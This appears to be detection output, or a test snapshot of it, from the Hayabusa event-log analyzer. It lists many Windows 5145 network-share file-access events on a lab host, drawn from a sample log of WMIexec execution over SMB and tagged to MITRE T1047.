+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
